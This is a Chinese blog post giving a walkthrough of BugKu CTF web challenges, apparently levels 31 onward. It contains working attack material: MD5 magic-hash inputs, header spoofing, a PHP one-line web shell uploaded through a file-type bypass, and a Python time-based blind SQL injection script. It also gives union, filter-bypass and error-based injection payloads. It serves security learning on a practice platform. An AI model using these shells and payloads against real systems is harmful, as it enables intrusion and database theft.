
<!DOCTYPE html>
<html lang class="loading">
<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>BugKuCTF — Web题(第31-40关) - Knlvre</title>
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate">
    <meta name="keywords" content="TriDiamond Obsidian,"> 
    <meta name="description" content="前一部分链接：第21-30关Write-up
第三十一关（md5 collision(NUPT_CTF)）我打开题目是没有给任何提示的，只有链接进去提示&amp;quot;please input a&amp;qu,"> 
    <meta name="author" content="Knlvre"> 
    <link rel="alternative" href="atom.xml" title="Knlvre" type="application/atom+xml"> 
    <link rel="icon" href="/knlvre.github.io/img/favicon.png"> 
    <link href="https://fonts.loli.net/css?family=Roboto+Mono|Rubik&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="//at.alicdn.com/t/font_1429596_nzgqgvnmkjb.css">
    <link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.7.2/animate.min.css">
    <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/css/share.min.css">
    <link rel="stylesheet" href="//cdn.bootcss.com/codemirror/5.48.4/codemirror.min.css">
    <link rel="stylesheet" href="//cdn.bootcss.com/codemirror/5.48.4/theme/dracula.css">
    <link rel="stylesheet" href="/knlvre.github.io/css/obsidian.css">
    <link rel="stylesheet" href="/knlvre.github.io/css/ball-atom.min.css">
</head>
</html>

<body class="loading">
    <div class="loader">
        <div class="la-ball-atom la-2x">
            <div></div>
            <div></div>
            <div></div>
            <div></div>
        </div>
    </div>
    <span id="config-title" style="display:none">Knlvre</span>
    <div id="loader"></div>
    <div id="single">
    <div class="scrollbar gradient-bg-rev"></div>
<div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <div class="navigation animated fadeIn fast delay-1s">
        <img id="home-icon" class="icon-home" src="/img/favicon.png" alt="" data-url="https://knlvre.github.io">
        <div id="play-icon" title="Play/Pause" class="iconfont icon-play"></div>
        <h3 class="subtitle">BugKuCTF — Web题(第31-40关)</h3>
        <div class="social">
            <!--        <div class="like-icon">-->
            <!--            <a href="javascript:;" class="likeThis active"><span class="icon-like"></span><span class="count">76</span></a>-->
            <!--        </div>-->
            <div>
                <div class="share">
                    
                        <a href="javascript:;" class="iconfont icon-share1"></a>
                        <div class="share-component-cc" data-disabled="facebook,douban,linkedin,diandian,tencent,google"></div>
                    
                </div>
            </div>
        </div>
    </div>
</div>

    <div class="section">
        <div class=article-header-wrapper>
    <div class="article-header">
        <div class="article-cover animated fadeIn" style="
            animation-delay: 600ms;
            animation-duration: 1.2s;
            background-image: 
                radial-gradient(ellipse closest-side, rgba(0, 0, 0, 0.65), #100e17),
                url(http://pic.netbian.com/uploads/allimg/180417/160606-1523952366b027.jpg);">
        </div>
        <div class="else">
            <p class="animated fadeInDown">
                
                <a href="javascript:;"><b>「 </b>Article<b> 」</b></a>
                
                April 10, 2019
            </p>
            <h3 class="post-title animated fadeInDown"><a href="/knlvre.github.io/2019/04/10/BugKuCTF—Web题 第31-40关/" title="BugKuCTF — Web题(第31-40关)">BugKuCTF — Web题(第31-40关)</a>
            </h3>
            
            <p class="post-count animated fadeInDown">
                
                <span>
                    <b class="iconfont icon-text2"></b> <i>Words count</i>
                    18k
                </span>
                
                
                <span>
                    <b class="iconfont icon-timer__s"></b> <i>Reading time</i>
                    16 mins.
                </span>
                
                
                
                <span id="busuanzi_container_page_pv">
                    <b class="iconfont icon-read"></b> <i>Read count</i>
                    <span id="busuanzi_value_page_pv">0</span>
                </span>
                
            </p>
            
            
            <ul class="animated fadeInDown post-tags-list"><li class="animated fadeInDown post-tags-list-item"><a class="animated fadeInDown post-tags-list-link" href="/knlvre.github.io/tags/CTF-Web/">CTF-Web</a></li></ul>
            
        </div>
    </div>
</div>

<div class="screen-gradient-after">
    <div class="screen-gradient-content">
        <div class="screen-gradient-content-inside">
            <div class="bold-underline-links screen-gradient-sponsor">
                <p>
                    <span class="animated fadeIn delay-1s"></span>
                </p>
            </div>
        </div>
    </div>
</div>

<div class="article">
    <div class='main'>
        <div class="content markdown animated fadeIn">
            <p>前一部分链接：<a href="https://knlvre.github.io/Knlvre.github-io/2019/03/28/BugKuCTF%E2%80%94Web%E9%A2%98%20%E7%AC%AC21-30%E5%85%B3/">第21-30关Write-up</a></p>
<h3 id="第三十一关（md5-collision-NUPT-CTF-）"><a href="#第三十一关（md5-collision-NUPT-CTF-）" class="headerlink" title="第三十一关（md5 collision(NUPT_CTF)）"></a>第三十一关（md5 collision(NUPT_CTF)）</h3><p>我打开题目是没有给任何提示的，只有链接进去提示<code>&quot;please input a&quot;</code>，源代码也没有写任何东西</p>
<p>去找别人的WriteUp，别人做题可以看到提示代码：</p>
<pre><code class="php">&lt;?php
$md51 = md5(&#39;QNKCDZO&#39;);
$a = @$_GET[&#39;a&#39;];
$md52 = @md5($a);
if(isset($a)){
if ($a != &#39;QNKCDZO&#39; &amp;&amp; $md51 == $md52) {
    echo &quot;nctf{*****************}&quot;;
} else {
    echo &quot;false!!!&quot;;
}}
else{echo &quot;please input a&quot;;}
?&gt;
</code></pre>
<p>那就是<code>$a</code>的值不等于<code>QNKCDZO</code>，但是<code>md5</code>加密后的值却要与之相等，只要找到经过md5加密后<code>0e开头的</code>值就行 </p>
<p>这里列举一些比较常用的：</p>
<pre><code>加密前字符串：
md5加密后密文：

s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020
</code></pre><p>这些原值当中随意选择一个提交上去就可以了</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/1-1.png" alt="1-1"></p>
<h3 id="第三十二关（程序员本地网站）"><a href="#第三十二关（程序员本地网站）" class="headerlink" title="第三十二关（程序员本地网站）"></a>第三十二关（程序员本地网站）</h3><p>链接进去，提示<code>请从本地访问！</code>。这个时候就行到了HTTP请求头的<code>X-Forwarded-For</code>字段，给出百度的解释：</p>
<pre><code>X-Forwarded-For（XFF）是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段

X-Forwarded-For: client1, proxy1, proxy2, proxy3
其中的值通过一个 逗号+空格 把多个IP地址区分开, 最左边(client1)是最原始客户端的IP地址, 代理服务器每成功收到一个请求，就把请求来源IP地址添加到右边。 在上面这个例子中，这个请求成功通过了三台代理服务器：proxy1, proxy2 及 proxy3。请求由client1发出，到达了proxy3(proxy3可能是请求的终点)。请求刚从client1中发出时，XFF是空的，请求被发往proxy1；通过proxy1的时候，client1被添加到XFF中，之后请求被发往proxy2;通过proxy2的时候，proxy1被添加到XFF中，之后请求被发往proxy3；通过proxy3时，proxy2被添加到XFF中，之后请求的的去向不明，如果proxy3不是请求终点，请求会被继续转发。
鉴于伪造这一字段非常容易，应该谨慎使用X-Forwarded-For字段。正常情况下XFF中最后一个IP地址是最后一个代理服务器的IP地址, 这通常是一个比较可靠的信息来源。
</code></pre><p>简单的说，通过这个字段，我们可以伪造假的<code>请求来源IP地址</code></p>
<p>题目要求从本地访问，那就是<code>127.0.0.1</code>，在HTTP请求头添加<code>X-Forwarded-For</code>字段：</p>
<pre><code>X-Forwarded-For：127.0.0.1
</code></pre><p>拿下flag</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/2-1.png" alt="2-1"></p>
<h3 id="第三十三关（各种绕过）"><a href="#第三十三关（各种绕过）" class="headerlink" title="第三十三关（各种绕过）"></a>第三十三关（各种绕过）</h3><p>链接进去看到代码：</p>
<pre><code class="php">&lt;?php 
highlight_file(&#39;flag.php&#39;); 
$_GET[&#39;id&#39;] = urldecode($_GET[&#39;id&#39;]); 
$flag = &#39;flag{xxxxxxxxxxxxxxxxxx}&#39;; 
if (isset($_GET[&#39;uname&#39;]) and isset($_POST[&#39;passwd&#39;])) { 
    if ($_GET[&#39;uname&#39;] == $_POST[&#39;passwd&#39;]) 

        print &#39;passwd can not be uname.&#39;; 

    else if (sha1($_GET[&#39;uname&#39;]) === sha1($_POST[&#39;passwd&#39;])&amp;($_GET[&#39;id&#39;]==&#39;margin&#39;)) 

        die(&#39;Flag: &#39;.$flag); 

    else 

        print &#39;sorry!&#39;; 

} 
?&gt;
</code></pre>
<p>要求：id的值经过urldecode之后等于margin，uname和passwd的值不相等，但是经过sha1()之后要想等</p>
<p>思路：英文单词再怎么编码都是原来的单词，中文和符号就会因为编码改变。利用数组绕过sha1()</p>
<p><code>payload</code>：</p>
<pre><code>?id=margin&amp;uname[]=1

//POST passwd的值：passwd[]=2
</code></pre><p>拿下flag</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/3-1.png" alt="3-1"></p>
<h3 id="第三十四关（web8）"><a href="#第三十四关（web8）" class="headerlink" title="第三十四关（web8）"></a>第三十四关（web8）</h3><p>链接进去看到代码：</p>
<pre><code class="php">&lt;?php
extract($_GET);
if (!empty($ac)){
    $f = trim(file_get_contents($fn));

    if ($ac === $f){
    echo &quot;&lt;p&gt;This is flag:&quot; .&quot; $flag&lt;/p&gt;&quot;;
    }
    else{
        echo &quot;&lt;p&gt;sorry!&lt;/p&gt;&quot;;
    }
}
?&gt;
</code></pre>
<p><code>trim()</code>函数：只传入参数没有额外写模式时，就是默认去掉空格</p>
<p>看到<code>file_get_contents</code>，想到<code>PHP伪协议（php://input）</code>，第<code>二十四关</code>有提到</p>
<p>题目提示<code>txt</code>，那应该就是<code>flag.txt</code>了，构造<code>payload</code>：</p>
<pre><code>?fn=php://input&amp;ac=flag.txt

//请求主体中提交字符串：flag.txt
</code></pre><p>拿下flag</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/4-1.png" alt="4-1"></p>
<h3 id="第三十五关（细心）"><a href="#第三十五关（细心）" class="headerlink" title="第三十五关（细心）"></a>第三十五关（细心）</h3><p>链接进去只看到以下内容，两个按钮点进去也没有任何帮助</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/5-1.png" alt="5-1"></p>
<p>但是看到其中的文字提示<code>No such file or directory</code>，应该是一个文件或者目录的查找操作</p>
<p>用<code>御剑</code>扫描一下，发现<code>robots.txt</code></p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/5-2.png" alt="5-2"></p>
<p>访问一下，看到<code>resusl.php</code></p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/5-3.png" alt="5-3"></p>
<p>访问一下</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/5-4.png" alt="5-4"></p>
<p>查看源代码，没有获得有用信息。用Burpsuits加上X-Forwarded-For：127.0.0.1也没用</p>
<p>最后想到题目提示：<code>想办法变成admin</code>，试一下把x的值设置为admin：</p>
<pre><code>?x=admin
</code></pre><p>没想到居然成功了，拿到了flag，感觉有点像脑洞题</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/5-5.png" alt="5-5"></p>
<h3 id="第二十六关（求getshell）"><a href="#第二十六关（求getshell）" class="headerlink" title="第二十六关（求getshell）"></a>第二十六关（求getshell）</h3><p>链接进去看到有上传文件的按钮，并且提示：<code>My name is margin,give me a image file not a php</code></p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/6-1.png" alt="6-1"></p>
<p>猜测应该是文件上传漏洞，那么与<code>getshell</code>有关的应该是要<code>一句话木马</code>，先写好保存下来</p>
<pre><code class="php">&lt;php @eval($_POST[&#39;123&#39;]) ?&gt;
</code></pre>
<p>提交的时候用<code>Burpsuits</code>抓取下来</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/6-2.png" alt="6-2"></p>
<p>要求我们上传<code>image</code>，但我们却上传<code>php</code>，所以需要修改头部，以此来欺骗服务器，将我们的文件成功传入</p>
<p>需要修改的地方有3处：<code>请求头的Content-Type</code>、<code>filename</code>、<code>请求数据的Content-Type</code></p>
<pre><code>求头的Content-Type：将任意的字母改成大写，绕过就可以

filename：测试过后缀黑名单后（php2, php3, php4, php5，phps, pht, phtm, phtml），发现只有php5可以绕过

请求数据的Content-Type：改为image/jpeg
</code></pre><p>修改完后，就可以成功提交上去。提交完也不用菜刀或蚁剑去连接上传的一句话木马，直接返回flag</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/6-3.png" alt="6-3"></p>
<h3 id="第二十七关（INSERT-INTO注入）"><a href="#第二十七关（INSERT-INTO注入）" class="headerlink" title="第二十七关（INSERT INTO注入）"></a>第二十七关（INSERT INTO注入）</h3><p>题目提示：</p>
<pre><code class="php">//不如写个Python吧

error_reporting(0);

function getIp(){
    $ip = &#39;&#39;;
    if(isset($_SERVER[&#39;HTTP_X_FORWARDED_FOR&#39;])){
        $ip = $_SERVER[&#39;HTTP_X_FORWARDED_FOR&#39;];
    }else{
        $ip = $_SERVER[&#39;REMOTE_ADDR&#39;];
    }
    $ip_arr = explode(&#39;,&#39;, $ip);
    return $ip_arr[0];    
}

$host=&quot;localhost&quot;;
$user=&quot;&quot;;
$pass=&quot;&quot;;
$db=&quot;&quot;;

$connect = mysql_connect($host, $user, $pass) or die(&quot;Unable to connect&quot;);

mysql_select_db($db) or die(&quot;Unable to select database&quot;);

$ip = getIp();
echo &#39;your ip is :&#39;.$ip;
$sql=&quot;insert into client_ip (ip) values (&#39;$ip&#39;)&quot;;
mysql_query($sql);
</code></pre>
<p>参考文章：<a href="https://www.cnblogs.com/sijidou/p/9657026.html" target="_blank" rel="noopener">基于时间注入的Python脚本</a></p>
<p>结题思路：</p>
<ol>
<li>需要用X-Forwarded-For字段来进行注入 </li>
<li><code>explode()</code>函数的作用是以逗号为分割点，只取第一部分<code>$ip_arr[0]</code>，相当于是过滤了<code>逗号</code></li>
<li>题目没有其他返回内容，包括报错，所以只能用<code>时间注入</code>，那就真的要写一个Python。</li>
<li>因为要使用时间注入，但是逗号又被过滤掉了，所以<code>substr()和substring()</code>无法正常使用，但是可以用<code>from 1 for 1</code>代替逗号</li>
</ol>
<p>首先，对注入语法有什么疑惑的（我！我有点疑惑），现在本地测试一下。我们同样在本地创建<code>test -&gt; client_ip</code>表</p>
<p>测试一下注入语句：</p>
<pre><code class="mysql">insert into client_ip (ip) values (&#39;1&#39; + (select case when (ascii(substr(database() from 1 for 1))=116) then sleep(3) else 0 end))#&#39;)
#我们的数据库为：test，所以第一位t的ASCII码为116
</code></pre>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/7-1.png" alt="7-1"></p>
<p>可以看到，我们将<code>116</code>换成<code>117</code>后，返回时间就变成了0，也就是说不符合条件，得到验证</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/7-2.png" alt="7-2"></p>
<p>接下来就写个Python脚本：</p>
<pre><code class="python">import requests

url = &#39;http://123.206.87.240:8002/web15/&#39;
allString = &#39;&#39;&#39;qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM0123456789.+-*/,./&lt;&gt;?&#39;&quot;;:]}[{\\|=+-_)(*&amp;^%$#@!~`&#39;&#39;&#39;
database = &#39;&#39;
flag = 1

table = &#39;(select group_concat(table_name) from information_schema.tables where table_schema=database())&#39;
#爆表名：client_ip,flag
column = &#39;(select group_concat(column_name) from information_schema.columns where table_name=&quot;flag&quot;)&#39;
#爆列名：flag
data = &#39;(select group_concat(flag) from flag)&#39;
#爆数据：cdbf14c9551d5be5612f7bb5d2867853

for i in range(1,50):
    for j in allString:
        header = {
            &quot;X-Forwarded-For&quot;:&quot;1&#39; + (select case when (ascii(substr(%s from %d for 1))=%d) then sleep(3) else 0 end))#&quot;%(data,i,ord(j))    #data位置根据需要选择字符串变量
        }
        r = requests.get(url,headers=header)
        t = r.elapsed.total_seconds()    #相应的时间，直接作为判断依据
        print(&#39;the time of &#39;+j+&#39; is &#39;+str(t))
        if t &gt;= 3:
            database = database + j
            #测试print(&#39;the &#39;+str(i)+&#39; place of database is &#39;+j)
            break
        elif t &lt; 3 and j == &#39;`&#39;:
            flag = 0
            break
    if flag == 0 :
        break
print(&#39;database:&#39;,database)
</code></pre>
<p>最后得到flag，需要自己加上边框</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/7-3.png" alt="7-3"></p>
<h3 id="第二十八关（这是一个神奇的登陆框）"><a href="#第二十八关（这是一个神奇的登陆框）" class="headerlink" title="第二十八关（这是一个神奇的登陆框）"></a>第二十八关（这是一个神奇的登陆框）</h3><p>URL提示是SQL注入</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/8-1.png" alt="7-1"></p>
<p>刚开始对<code>用户名</code>字段注入，<code>单引号</code>、<code>两个单引号</code>都失败，使用<code>双引号</code>才出现报错信息</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/8-2.png" alt="8-2"></p>
<p>好像没有被包裹，尝试一下，失败</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/8-3.png" alt="8-3"></p>
<p>用<code>密码</code>字段试一下，可以出现报错信息，发现用<code>双引号</code>包裹</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/8-4.png" alt="8-4"></p>
<p>加上<code>or 1=1 --+</code>直接给出提示：<code>Login_Name:AdMiNhEhE</code>、<code>You must login with correct ACCOUNT and PASSWORD!</code></p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/8-5.png" alt="8-5"></p>
<p>直接将用户名改为它要求的哪个，然后用<code>password字段</code>直接注入，比较简单，不再赘述</p>
<pre><code>admin_name=AdMiNhEhE&amp;admin_passwd=password&quot; union select (select group_concat(table_name) from information_schema.tables where table_schema=database()),2 --+ &amp;submit=GO GO GO
#爆表名：flag1,whoami

admin_name=AdMiNhEhE&amp;admin_passwd=password&quot; union select (select group_concat(column_name) from information_schema.columns where table_name=&#39;flag1&#39;),2 --+ &amp;submit=GO GO GO
#爆列名：flag1

admin_name=AdMiNhEhE&amp;admin_passwd=password&quot; union select (select group_concat(flag1) from flag1),2 --+ &amp;submit=GO GO GO
#爆数据：ed6b28e684817d9efcaf802979e57aea
</code></pre><p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/8-6.png" alt="8-6"></p>
<h3 id="第二十九关（多次）"><a href="#第二十九关（多次）" class="headerlink" title="第二十九关（多次）"></a>第二十九关（多次）</h3><p>尝试过程：</p>
<pre><code>?id=1&#39;
#报错

?id=1&#39; #
#报错
?id=1&#39; %23
#正常，过滤了#号，要用%23代替。--+没有被过滤

?id=1&#39; or 1=1 %23
#报错
?id=1&#39; || 1=1 %23
#正常，过滤了or
</code></pre><p>用正常语句来判断那个单词被过滤效率比较低，看了别人的Writeup，学习到了一种新方法</p>
<p><code>异或注入</code>：两个条件相同（同真或同假）即为假</p>
<p>如下面的语句，当<code>union</code>被过滤时，也就是<code>length(&#39;union&#39;)!=0</code>为假，<code>length(&#39;union&#39;)==0</code>为真，union<code>被过滤了</code>，下面的等式等于：<code>1^0=1</code>，页面应该正常返回</p>
<pre><code class="mysql">?id=1&#39;^(length(&#39;union&#39;)!=0)--+
</code></pre>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/9-1.png" alt="9-1"></p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/9-2.png" alt="9-2"></p>
<p>按照这种方法，发现被过滤的一共有：<code>union、select、or、and</code></p>
<p>然后发现<code>双写</code>可以直接绕过过滤</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/9-3.png" alt="9-3"></p>
<p>爆表名：（此时要记得，<code>information</code>里面也有<code>or</code>，记得双写）</p>
<pre><code>?id=-1&#39; uniunionon selselectect 1,group_concat(table_name) from infoorrmation_schema.tables where table_schema=database() --+
#flag1,hint
</code></pre><p>爆列名：</p>
<pre><code>?id=-1&#39; uniunionon selselectect 1,group_concat(column_name) from infoorrmation_schema.columns where table_name=&#39;flag1&#39; --+
#flag1,address
</code></pre><p>爆数据：</p>
<pre><code>?id=-1&#39; uniunionon selselectect 1,group_concat(flag1) from flag1 --+
#usOwycTju+FTUUzXosjr
</code></pre><p>对爆出来的字符串没什么想法，想起来题目提示本题有<code>两个flag</code></p>
<p>爆另外一列的数据：</p>
<pre><code>?id=-1&#39; uniunionon selselectect 1,group_concat(address) from flag1 --+
</code></pre><p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/9-4.png" alt="9-4"></p>
<p>点击后进入下一关</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/9-5.png" alt="9-5"></p>
<p>加上<code>单引号</code>时，弹出报错信息，可以判断是用单引号包裹的</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/9-6.png" alt="9-6"></p>
<p>同理，用前面学到的异或运算，判断页面有哪几种状态</p>
<pre><code>?id=1&#39;^1 --+

?id=1&#39;^0 --+
</code></pre><p>此时我们知道了，网页有两种状态：1.正确时返回<code>Hello,I Am Here!</code>，2.错误时返回<code>Nobody!</code></p>
<p>想要开始测试被过滤的单词，后来我们发现，服务器给我们返回我们输入的<code>id</code>值，如果字符被过滤掉，就不会回显</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/9-7.png" alt="9-7"></p>
<p>我们也可以直接利用这点直接判断那些被过滤：</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/9-8.png" alt="9-8"></p>
<p>从上图我们可以看出<code>union</code>、<code>sleep</code>被过滤了，并且此题无法用<code>大小写</code>、<code>双写</code>来绕过，但是<code>报错注入</code>没有被过滤</p>
<p>爆表名：</p>
<pre><code>?id=1&#39; and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))--+
#class,flag2
</code></pre><p>爆列名：</p>
<pre><code>?id=1&#39; and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=&#39;flag2&#39;)))--+
#flag2,address
</code></pre><p>爆数据：</p>
<pre><code>?id=1&#39; and extractvalue(1,concat(0x7e,(select group_concat(flag2) from flag2),0x7e))--+
#flag{Bugku-sql_6s-2i-4t-bug}，但这个不是flag，骗人

?id=1&#39; and extractvalue(1,concat(0x7e,(select group_concat(address) from flag2),0x7e))--+
./Have_Fun.php
</code></pre><p>和第一步一样，有一个地址，访问一下一片空白，用<code>Burpsuits</code>看一下</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/9-9.png" alt="9-9"></p>
<p>添加<code>X-Forwarded-For</code>字段，发现返回图片</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/9-10.png" alt="9-10"></p>
<p>用浏览器看一下发现是一张<code>二维码</code>，用手机扫描：</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/9-11.png" alt="9-11"></p>
<p>进入这个页面后，开始失去了方向，参数game传入也没有用，最后回到题目提示：</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/BugkuCTFWeb/31-40/9-12.png" alt="9-12"></p>
<p><code>flag只有2个</code>，那我们爆出来的flag2就是答案才对</p>
<p>再看第二句，<code>flag是小写</code>，把flag的B改成小写b：<code>flag{bugku-sql_6s-2i-4t-bug}</code></p>
<p>提交一下，成功了。。。。。</p>
<p>所以第三步是骗人的，要回到题目提示，不然会被自己带进去绕不出来</p>
<hr>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls"
                data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
            <ul id="audio-list" style="display:none">
                
                
                <li title='0' data-url='/knlvre.github.io/statics/YoungAndBeautiful.mp3'></li>
                
                    
            </ul>
            
            
            
    <div id='gitalk-container' class="comment link"
        data-ae='true'
        data-ci='ec894e2b66f752e8b7fb'
        data-cs='3ccc2e92bb350688fe2c2dc2930189b62622bfb1'
        data-r='blog-comments'
        data-o='TriDiamond'
        data-a='TriDiamond'
        data-d=''
    >Comments</div>


            
            
        </div>
        <div class="sidebar">
            <div class="box animated fadeInRight">
                <div class="subbox">
                    <img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/ico/HaZong.jpg" height=300 width=300></img>
                    <p>Knlvre</p>
                    <span>Notes During Information Security Learning.</span>
                    <dl>
                        <dd><a href="https://github.com/knlvre" target="_blank"><span
                                    class=" iconfont icon-github"></span></a></dd>
                        <dd><a href="https://github.com/knlvre" target="_blank"><span
                                    class=" iconfont icon-twitter"></span></a></dd>
                        <dd><a href="https://github.com/knlvre" target="_blank"><span
                                    class=" iconfont icon-stack-overflow"></span></a></dd>
                    </dl>
                </div>
                <ul>
                    <li><a href="/">66 <p>Articles</p></a></li>
                    <li><a href="/categories">0 <p>Categories</p></a></li>
                    <li><a href="/tags">10 <p>Tags</p></a></li>
                </ul>
            </div>
            
            
            
            <div class="box sticky animated fadeInRight faster">
                <div id="toc" class="subbox">
                    <h4>Contents</h4>
                    <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#第三十一关（md5-collision-NUPT-CTF-）"><span class="toc-number">1.</span> <span class="toc-text">第三十一关（md5 collision(NUPT_CTF)）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#第三十二关（程序员本地网站）"><span class="toc-number">2.</span> <span class="toc-text">第三十二关（程序员本地网站）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#第三十三关（各种绕过）"><span class="toc-number">3.</span> <span class="toc-text">第三十三关（各种绕过）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#第三十四关（web8）"><span class="toc-number">4.</span> <span class="toc-text">第三十四关（web8）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#第三十五关（细心）"><span class="toc-number">5.</span> <span class="toc-text">第三十五关（细心）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#第二十六关（求getshell）"><span class="toc-number">6.</span> <span class="toc-text">第二十六关（求getshell）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#第二十七关（INSERT-INTO注入）"><span class="toc-number">7.</span> <span class="toc-text">第二十七关（INSERT INTO注入）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#第二十八关（这是一个神奇的登陆框）"><span class="toc-number">8.</span> <span class="toc-text">第二十八关（这是一个神奇的登陆框）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#第二十九关（多次）"><span class="toc-number">9.</span> <span class="toc-text">第二十九关（多次）</span></a></li></ol>
                </div>
            </div>
            
            
        </div>
    </div>
</div>

    </div>
</div>
    <div id="back-to-top" class="animated fadeIn faster">
        <div class="flow"></div>
        <span class="percentage animated fadeIn faster">0%</span>
        <span class="iconfont icon-top02 animated fadeIn faster"></span>
    </div>
</body>
<footer>
    <p class="copyright" id="copyright">
        &copy; 2019
        <span class="gradient-text">
            Knlvre
        </span>.
        Powered by <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a>
        Theme
        <span class="gradient-text">
